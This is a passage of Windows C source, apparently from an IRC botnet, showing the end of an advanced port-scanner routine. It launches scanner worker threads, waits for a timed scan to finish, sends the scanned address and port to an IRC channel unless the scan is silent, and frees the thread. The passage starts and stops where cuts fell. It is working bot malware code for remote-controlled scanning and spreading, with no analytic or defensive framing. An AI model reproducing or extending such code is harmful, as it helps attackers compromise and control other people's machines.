= CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }